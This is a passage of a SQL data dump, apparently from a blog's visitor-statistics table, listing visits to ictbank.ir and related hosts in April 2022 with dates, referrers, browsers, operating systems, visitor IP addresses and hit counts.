(19914,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','40.121.110.133','000',0,1,0),
(19915,'2022-04-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(19916,'2022-04-06','http://ictbank.ir/blog','Firefox','OS X','10.10',NULL,NULL,'','81.7.15.127','000',0,2,0),
(19917,'2022-04-06','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','160.116.22.21','000',0,2,0),
(19918,'2022-04-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19919,'2022-04-06','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','95.217.190.251','000',0,1,0),
(19920,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.64.55.145','000',0,2,0),
(19921,'2022-04-06','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','138.199.10.64','000',0,2,0),
(19922,'2022-04-06','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','211.24.120.66','000',0,1,0),
(19923,'2022-04-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,5,0),
(19924,'2022-04-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','81.234.138.185','000',0,2,0),
(19925,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.11','000',0,1,0),
(19926,'2022-04-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(19927,'2022-04-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.124.182','000',0,2,0),
(19928,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.253.204.124','000',0,2,0),
(19929,'2022-04-06','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','5.82.159.104','000',0,1,0),
(19930,'2022-04-06','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','101.68.211.3','000',0,4,0),
(19931,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.35.236','000',0,1,0),
(19932,'2022-04-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(19933,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.199.23','000',0,2,0),
(19934,'2022-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(19935,'2022-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(19936,'2022-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19937,'2022-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19938,'2022-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(19939,'2022-04-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19940,'2022-04-07','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','143.198.25.13','000',0,1,0),
(19941,'2022-04-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','173.249.10.94','000',0,1,0),
(19942,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.35.4.8','000',0,2,0),
(19943,'2022-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19944,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.58.168.98','000',0,2,0),
(19945,'2022-04-07','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.51','000',0,3,0),
(19946,'2022-04-07','http://ictbank.ir/blog','Chrome','OS X','10.9.4',NULL,NULL,'','217.198.191.195','000',0,2,0),
(19947,'2022-04-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19948,'2022-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19949,'2022-04-07','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.40','000',0,1,0),
(19950,'2022-04-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(19951,'2022-04-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','5.253.204.120','000',0,15,0),
(19952,'2022-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.100.87.174','000',0,1,0),
(19953,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.43','000',0,1,0),
(19954,'2022-04-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.72','000',0,2,0),
(19955,'2022-04-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,2,0),
(19956,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.248.137','000',0,1,0),
(19957,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19958,'2022-04-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.79','000',0,2,0),
(19959,'2022-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(19960,'2022-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(19961,'2022-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19962,'2022-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(19963,'2022-04-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.85','000',0,2,0),
(19964,'2022-04-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.86','000',0,2,0),
(19965,'2022-04-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.41','000',0,2,0),
(19966,'2022-04-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(19967,'2022-04-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.22.68.73','000',0,1,0),
(19968,'2022-04-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19969,'2022-04-08','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','84.247.50.180','000',0,2,0),
(19970,'2022-04-08','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(19971,'2022-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.135.218.118','000',0,5,0),
(19972,'2022-04-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,4,0),
(19973,'2022-04-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(19974,'2022-04-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(19975,'2022-04-08','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','160.116.22.21','000',0,2,0),
(19976,'2022-04-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','144.91.106.14','000',0,1,0),
(19977,'2022-04-08','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','217.138.193.104','000',0,2,0),
(19978,'2022-04-08','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','152.32.215.238','000',0,1,0),
(19979,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.21','000',0,1,0),
(19980,'2022-04-08','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','167.86.98.113','000',0,4,0),
(19981,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','144.91.96.172','000',0,2,0),
(19982,'2022-04-08','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.172','000',0,5,0),
(19983,'2022-04-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19984,'2022-04-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(19985,'2022-04-08','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(19986,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','60.208.167.198','000',0,1,0),
(19987,'2022-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(19988,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.112.163','000',0,1,0),
(19989,'2022-04-08','https://www.google.com/','Samsung Internet','Android','11',NULL,NULL,'','86.55.158.197','000',0,1,0),
(19990,'2022-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(19991,'2022-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(19992,'2022-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,2,0),
(19993,'2022-04-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','81.236.199.89','000',0,2,0),
(19994,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.189.80.124','000',0,2,0),
(19995,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.163.222.238','000',0,2,0),
(19996,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.86.108.232','000',0,1,0),
(19997,'2022-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(19998,'2022-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.72','000',0,2,0),
(19999,'2022-04-09','http://ictbank.ir/blog/index.php/tag/redat/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.6','000',0,7,0),
(20000,'2022-04-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20001,'2022-04-09','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','3.222.188.246','000',0,1,0),
(20002,'2022-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','216.172.172.15','000',0,1,0),
(20003,'2022-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.253.14','000',0,1,0),
(20004,'2022-04-09','http://ictbank.ir/blog','Safari','OS X','10.6.6',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20005,'2022-04-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(20006,'2022-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.133.120.74','000',0,2,0),
(20007,'2022-04-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,4,0),
(20008,'2022-04-09','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.6','000',0,3,0),
(20009,'2022-04-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20010,'2022-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(20011,'2022-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(20012,'2022-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(20013,'2022-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','61.167.35.130','000',0,4,0),
(20014,'2022-04-09','http://ictbank.ir/blog/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.2','000',0,8,0),
(20015,'2022-04-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(20016,'2022-04-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','212.129.38.106','000',0,3,0),
(20017,'2022-04-10','http://www.design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(20018,'2022-04-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.215','000',0,1,0),
(20019,'2022-04-10','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(20020,'2022-04-10','http://ictbank.ir/blog/index.php/category/database/oracle/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.4','000',0,7,0),
(20021,'2022-04-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20022,'2022-04-10','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.180','000',0,1,0),
(20023,'2022-04-10','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.229','000',0,1,0),
(20024,'2022-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.212.230.144','000',0,1,0),
(20025,'2022-04-10','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','50.31.21.6','000',0,2,0),
(20026,'2022-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(20027,'2022-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(20028,'2022-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(20029,'2022-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(20030,'2022-04-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.101.33','000',0,1,0),
(20031,'2022-04-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.129.61.1','000',0,1,0),
(20032,'2022-04-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.182.157.251','000',0,1,0),
(20033,'2022-04-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,8,0),
(20034,'2022-04-11','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.153.6.202','000',0,7,0),
(20035,'2022-04-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(20036,'2022-04-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20037,'2022-04-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','182.50.132.78','000',0,1,0),
(20038,'2022-04-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','14.207.67.230','000',0,1,0),
(20039,'2022-04-11','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.4.206','000',0,2,0),
(20040,'2022-04-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(20041,'2022-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.41','000',0,2,0),
(20042,'2022-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.169.71','000',0,1,0),
(20043,'2022-04-11','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','209.23.10.104','000',0,1,0),
(20044,'2022-04-11','http://ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','194.163.130.196','000',0,1,0),
(20045,'2022-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(20046,'2022-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(20047,'2022-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(20048,'2022-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20049,'2022-04-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(20050,'2022-04-11','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.189','000',0,1,0),
(20051,'2022-04-11','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.67.9.185','000',0,7,0),
(20052,'2022-04-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.224.155','000',0,2,0),
(20053,'2022-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.89','000',0,1,0),
(20054,'2022-04-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20055,'2022-04-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(20056,'2022-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.17','000',0,2,0),
(20057,'2022-04-12','http://ictbank.ir/blog','Safari','OS X','10.6.7',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20058,'2022-04-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(20059,'2022-04-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(20060,'2022-04-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','66.115.181.131','000',0,1,0),
(20061,'2022-04-12','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.196','000',0,1,0),
(20062,'2022-04-12','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.249.246','000',0,2,0),
(20063,'2022-04-12','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','98.14.185.59','000',0,1,0),
(20064,'2022-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.212.247','000',0,1,0),
(20065,'2022-04-12','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,3,0),
(20066,'2022-04-12','https://www.google.com/','Samsung Internet','Android','11',NULL,NULL,'','46.51.46.111','000',0,5,0),
(20067,'2022-04-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.205.7.232','000',0,1,0),
(20068,'2022-04-12','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.57.203','000',0,7,0),
(20069,'2022-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(20070,'2022-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(20071,'2022-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20072,'2022-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20073,'2022-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','40.121.110.133','000',0,1,0),
(20074,'2022-04-12','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','180.163.220.66','000',0,1,0),
(20075,'2022-04-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','220.163.77.19','000',0,1,0),
(20076,'2022-04-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20077,'2022-04-13','http://ictbank.ir/blog','Chrome','Android','8.0',NULL,NULL,'','171.13.14.75','000',0,1,0),
(20078,'2022-04-13','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','193.111.199.64','000',0,2,0),
(20079,'2022-04-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.163','000',0,2,0),
(20080,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.41.12.172','000',0,1,0),
(20081,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.199.23','000',0,2,0),
(20082,'2022-04-13','https://www.google.cz/','Chrome','Windows','10.0',NULL,NULL,'','147.161.170.84','000',0,1,0),
(20083,'2022-04-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','209.120.227.2','000',0,1,0),
(20084,'2022-04-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,5,0),
(20085,'2022-04-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.153.160.134','000',0,1,0),
(20086,'2022-04-13','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.57.203','000',0,7,0),
(20087,'2022-04-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.164','000',0,4,0),
(20088,'2022-04-13','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','59.93.123.56','000',0,2,0),
(20089,'2022-04-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(20090,'2022-04-13','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','193.176.86.41','000',0,3,0),
(20091,'2022-04-13','https://www.google.com/','Chrome','Android','6.0.1',NULL,NULL,'','203.78.118.153','000',0,1,0),
(20092,'2022-04-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,2,0),
(20093,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.144.181','000',0,1,0),
(20094,'2022-04-13','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.241.64','000',0,2,0),
(20095,'2022-04-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(20096,'2022-04-13','http://www.wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.27.104','000',0,2,0),
(20097,'2022-04-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(20098,'2022-04-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','60.13.138.34','000',0,1,0),
(20099,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.101.67','000',0,1,0),
(20100,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.100.87.202','000',0,1,0),
(20101,'2022-04-13','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,8,0),
(20102,'2022-04-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20103,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','37.123.163.58','000',0,2,0),
(20104,'2022-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.242.196.176','000',0,2,0),
(20105,'2022-04-13','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','137.184.228.161','000',0,6,0),
(20106,'2022-04-14','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','104.131.20.108','000',0,2,0),
(20107,'2022-04-14','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','144.172.73.66','000',0,2,0),
(20108,'2022-04-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20109,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.204.55.151','000',0,3,0),
(20110,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.225.30.218','000',0,2,0),
(20111,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.220.102.250','000',0,2,0),
(20112,'2022-04-14','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.222.167.247','000',0,4,0),
(20113,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.42','000',0,1,0),
(20114,'2022-04-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20115,'2022-04-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(20116,'2022-04-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(20117,'2022-04-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.169.158.126','000',0,1,0),
(20118,'2022-04-14','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','51.79.49.224','000',0,5,0),
(20119,'2022-04-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.110','000',0,1,0),
(20120,'2022-04-14','http://ictbank.ir/blog/index.php/homepage_test/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.6','000',0,8,0),
(20121,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.62.72.168','000',0,4,0),
(20122,'2022-04-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,8,0),
(20123,'2022-04-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','85.115.53.140','000',0,2,0),
(20124,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','105.155.99.124','000',0,2,0),
(20125,'2022-04-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.204.143.143','000',0,1,0),
(20126,'2022-04-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.115.52.140','000',0,2,0),
(20127,'2022-04-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.90','000',0,2,0),
(20128,'2022-04-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(20129,'2022-04-14','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','172.104.32.210','000',0,2,0),
(20130,'2022-04-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.103','000',0,2,0),
(20131,'2022-04-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','135.148.100.25','000',0,2,0),
(20132,'2022-04-14','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(20133,'2022-04-14','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','124.126.78.196','000',0,1,0),
(20134,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.101.3','000',0,2,0),
(20135,'2022-04-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20136,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','80.82.78.13','000',0,1,0),
(20137,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','109.70.100.22','000',0,1,0),
(20138,'2022-04-15','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,2,0),
(20139,'2022-04-15','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.192.96.41','000',0,1,0),
